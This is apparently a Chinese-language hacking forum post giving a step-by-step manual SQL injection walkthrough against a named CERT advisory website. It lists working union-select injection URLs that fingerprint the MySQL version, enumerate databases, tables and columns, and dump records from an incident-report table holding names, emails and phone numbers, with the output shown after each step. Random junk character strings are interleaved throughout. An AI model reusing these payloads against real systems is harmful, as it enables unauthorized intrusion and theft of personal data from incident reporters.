1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询* T; M( G# y2 s; x3 y* A, P
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
P& T+ w9 Z$ yhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
7 V& G6 }5 t- p+ A5 O2 o; }" r3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
2 Z3 n( V/ r& `( \% Y数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。. O& J" X) q/ r: y, B2 l# c( x% ^/ [# |7 N
4.判断有没有写权限$ J, t% P' G* F1 |
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限$ l- s1 y# g! x/ r6 o
没办法,手动猜表啦: l; |. G4 ~+ B5 o: ~' z6 |
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1: J# p" A6 d# P: y4 ^) N
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
% D! W1 s0 @( z) e( d9 \- Lhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--$ B. r: Y4 s) g+ H5 @/ c: q2 i3 E
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
. T F, S. y7 E' oinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
3 v" `) z% s3 l: }& S. i4 K I6.爆表,爆的是twcert库
9 Q( E1 E" T4 L: ghttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--( x1 l9 P! Z# y0 p" {8 ]# w5 u
爆出如下表
0 S' H* K* H6 N" V/ ^5 Adownloadfile,irsys,newsdata,secrpt,secrpt_big5" H- w- g7 A7 N& q8 M% L' V
7.爆列名,这次爆的是irsys表2 U' h$ Q( D/ d5 h1 ?3 g) k: m9 |" T
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
6 k6 P, x. B. S2 c/ ?0 F5 L9 I爆出如下列
6 F$ z3 s. h! O% w8 z/ V. w# Vir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status& [! W5 a# s# O6 d2 z
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
; f! H9 k! v2 P* }- O- p+ b6 M2 whttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--6 L$ W/ w" h5 ~0 r8 N
返回是3,说明每个列里有3个地段' a. Q5 p# j; v6 { f
9.爆字段内容
1 D6 ^% D9 H* [http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--/ R, r) V1 |5 s& n& O' a) x
爆出name列的第一个字段的内容
0 e( |* d1 j Shttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--( V/ M9 @( p! ?/ J
爆出name列的第二个字段的内容 |